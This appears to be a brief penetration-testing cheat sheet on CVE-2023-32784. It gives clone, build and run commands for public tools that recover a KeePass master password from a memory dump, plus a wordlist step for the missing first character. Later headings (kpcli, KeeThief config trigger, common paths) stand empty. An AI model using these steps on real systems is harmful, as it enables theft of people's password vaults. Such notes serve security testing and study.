KeePass KeeThief
CVE-2023-32784 - Memory Dump Master Password Extraction
Tools
# Rust version (fast)
git clone https://github.com/JorianWoltjer/keepass-dump-extractor
cd keepass-dump-extractor && cargo build --release
# Python version
git clone https://github.com/matro7sh/keepass-dump-masterkeyExploitation
# Extract password (may have first char missing)
./keepass-dump-extractor KeePassDumpFull.dmp
# Output shows partial password with bullets for unknown chars
●ødgrød med fløde
# Generate wordlist for missing first char
./keepass-dump-extractor -f all KeePassDumpFull.dmp > wordlist.txt
# Python version
python3 poc.py KeePassDumpFull.dmpCracking KeePass Database
kpcli - KeePass CLI
Useful Commands
Command
Description
KeeThief Config Trigger (Windows)
Common KeePass Paths
Last updated